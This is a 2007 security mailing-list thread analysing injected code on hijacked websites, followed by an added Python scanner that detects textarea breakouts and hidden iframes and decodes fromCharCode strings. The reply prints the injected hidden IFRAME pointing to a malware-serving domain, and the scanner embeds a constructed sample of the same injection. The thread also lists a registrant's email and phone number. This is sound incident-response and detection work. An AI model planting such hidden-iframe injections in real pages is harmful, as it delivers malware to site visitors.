[Dshield] need help decoding.
wiretapp at gmail.com
Wed Sep 19 03:14:41 GMT 2007
</textatea></textarea><IFRAME src="http:// marcobernardoni. com /x
/index.php" width=3 height=3 style="display:none"></IFRAME>
-snip- (spaces added to prevent accidental clicking)
The </textarea> HTML closing tag is there to evade techniques like the one
described by Tom Liston here:
marcobernardoni.com is running on an IP out of Hong Kong and the index
pushes file.php... Of course it's a Windows PE binary; however, it seems to
be broken. I don't have time to manually run through it; perhaps
someone else does.
Domain Name: MARCOBERNARDONI.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.35.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.NAMESELF.COM
Name Server: NS2.NAMESELF.COM
Updated Date: 08-jul-2007
Creation Date: 28-may-2007
Expiration Date: 28-may-2008
FuzioN FuzioN fuzka at bk.ru +7.9015371916
Record last updated at 2007-07-08 15:30:57
Record created on 2007/5/28
Record expired on 2008/5/28
A RECORD: 22.214.171.124
On 9/18/07, Dan Jackson <kybowhunter515 at yahoo.com> wrote:
> Recently several of my sites got hijacked and below is the code that
> was inserted, what I'm trying to do is to decode it to figure out what
> it's intent was and to see if it opened up any other holes in the
> server that I need to know about.
> Maybe this is easy stuff... but I don't have a clue where to start ...
> Code: ( text )
> ing.fromCharCode(t));t='';}}nbsp();</script><!-- c4 -->
> any help would be greatly appreciated.
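As an added example, not code from either poster, here is a small Python triage script of the kind Dan asked for. It walks an HTML page and reports three indicators the thread discusses: an unmatched </textarea> end tag (the breakout the first reply points at; this assumes the viewing technique referred to wraps untrusted markup in a <textarea> so it is displayed rather than rendered), IFRAMEs that are hidden by style or sized to a few pixels, and String.fromCharCode(...) calls with literal code lists, which it decodes so the constructed string can be read. The sample page, the host name example.invalid and the script body inside it are constructed here; they are not the injected code from the thread.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not the code from the thread): an unmatched
# </textarea>, a 3x3 hidden IFRAME and a fromCharCode-obfuscated script.
# The host name is a placeholder.
SAMPLE_HTML = """<html><body><p>legit content</p>
</textarea><IFRAME src="http://example.invalid/x/index.php" width=3 height=3 style="display:none"></IFRAME>
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,62));</script>
</body></html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*([\d\s,]+)\)")


def _tiny(value):
    """True for a width/height attribute of at most 5 (bare number or px)."""
    if value is None:
        return False
    digits = re.match(r"\s*(\d+)", str(value))
    return digits is not None and int(digits.group(1)) <= 5


def iframe_is_hidden(attrs):
    """Hidden-iframe heuristic: display:none / visibility:hidden, or a tiny box."""
    style = attrs.get("style") or ""
    return bool(HIDDEN_STYLE.search(style)) or (
        _tiny(attrs.get("width")) and _tiny(attrs.get("height"))
    )


def decode_fromcharcode(js):
    """Decode every String.fromCharCode(n, n, ...) call that has a literal code list."""
    decoded = []
    for m in FROMCHARCODE.finditer(js):
        codes = [int(x) for x in m.group(1).split(",") if x.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


class InjectionScanner(HTMLParser):
    """Collect textarea breakouts, hidden iframes and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.open_textareas = 0
        self.orphan_textarea_closes = 0  # </textarea> with no open <textarea>
        self.hidden_iframes = []         # src of each hidden or tiny IFRAME
        self.scripts = []                # inline script text, in document order
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "textarea":
            self.open_textareas += 1
        elif tag == "iframe" and iframe_is_hidden(a):
            self.hidden_iframes.append(a.get("src") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "textarea":
            if self.open_textareas:
                self.open_textareas -= 1
            else:
                self.orphan_textarea_closes += 1
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan(html):
    """Return the indicators found in one HTML document."""
    p = InjectionScanner()
    p.feed(html)
    p.close()
    return {
        "orphan_textarea_closes": p.orphan_textarea_closes,
        "hidden_iframes": p.hidden_iframes,
        "decoded_fromcharcode": decode_fromcharcode("".join(p.scripts)),
    }


if __name__ == "__main__":
    for key, val in scan(SAMPLE_HTML).items():
        print(f"{key}: {val}")
```

Run it against a saved copy of each affected page; an orphan </textarea> count above zero or a non-empty hidden_iframes list is worth a closer look, and the decoded strings show what a fromCharCode loop was assembling without executing it. The decoder only handles literal code lists, so a script that computes the codes at runtime (as the truncated fragment in Dan's mail appears to) will show up in scripts but not in decoded_fromcharcode.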